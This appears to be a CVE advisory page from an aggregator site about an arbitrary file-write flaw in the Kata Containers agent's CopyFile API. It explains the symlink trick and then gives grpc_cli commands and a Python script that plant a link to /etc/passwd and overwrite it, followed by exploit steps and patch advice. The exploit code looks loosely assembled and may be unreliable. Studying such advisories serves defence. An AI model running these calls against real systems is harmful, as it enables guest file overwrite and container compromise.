Listen to this Post
How the CVE Works (approx. 20 lines):
The vulnerability resides in the Kata Agent’s `CopyFile` API, specifically in how the `genpolicy` policy enforces file copy operations. The policy only validates the destination `path` parameter, ensuring it resides within the shared directory (e.g., /run/kata-containers/shared/containers). Critically, the policy does not inspect any other fields in the `CopyFileRequest` message, such as the `data` field. An attacker can exploit this by first issuing a `CopyFile` request that creates a symbolic link. In this request, the `path` is set to a location inside the allowed shared directory, but the `data` field contains the target path of an arbitrary file on the guest filesystem (e.g., a critical system binary). Since the policy only checks the path, this symlink creation request is permitted. The result is a symlink inside the shared directory that points to a sensitive file outside of it. In a second step, the attacker crafts another legitimate `CopyFile` request. This request writes malicious data to the symlink path (the path in the shared directory). Because the symlink is followed by the underlying filesystem, the write operation is transparently redirected to the symlink’s target, allowing the attacker to overwrite any file on the guest’s root filesystem that the kata-agent has permissions to modify. This primitive enables complete subversion of container images, including those running in Confidential VMs (CVMs), allowing for arbitrary code execution and data exfiltration.
dailycve form:
Platform: Kata Containers
Version: 3.4.0-3.28.0
Vulnerability: Arbitrary file write
Severity: High
Date: 2026-04-24
Prediction: Patch 2026-05-15
What Undercode Say:
Simulate malicious symlink creation via CopyFile API grpc_cli call localhost:50051 CopyFileService/CopyFile \ 'path: "/run/kata-containers/shared/containers/evil_link", data: "/etc/passwd"' Overwrite target via symlink using crafted payload grpc_cli call localhost:50051 CopyFileService/CopyFile \ 'path: "/run/kata-containers/shared/containers/evil_link", data: "malicious_content"'
Python snippet to exploit the symlink following behaviour
import grpc
import copyfile_pb2
def exploit():
channel = grpc.insecure_channel('localhost:50051')
stub = copyfile_pb2.CopyFileStub(channel)
Step 1: Create symlink inside shared dir pointing to /etc/passwd
stub.CopyFile(copyfile_pb2.CopyFileRequest(
path="/run/kata-containers/shared/containers/link_to_passwd",
data="/etc/passwd"
))
Step 2: Overwrite /etc/passwd via symlink
stub.CopyFile(copyfile_pb2.CopyFileRequest(
path="/run/kata-containers/shared/containers/link_to_passwd",
data="malicious_content"
))
Exploit:
- Discover target path in guest (e.g.,
/bin/bash). - Create symlink from shared dir to target path.
- Write malicious data through symlink.
- Restart container to trigger payload.
Protection from this CVE:
- Upgrade Kata Containers to v3.29.0 or later.
- Implement custom policy validating symlink targets.
- Restrict `CopyFile` API access using seccomp.
Impact:
Complete host-side compromise of container images, leading to guest binary overwrite, container escape, and data theft from CVMs.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
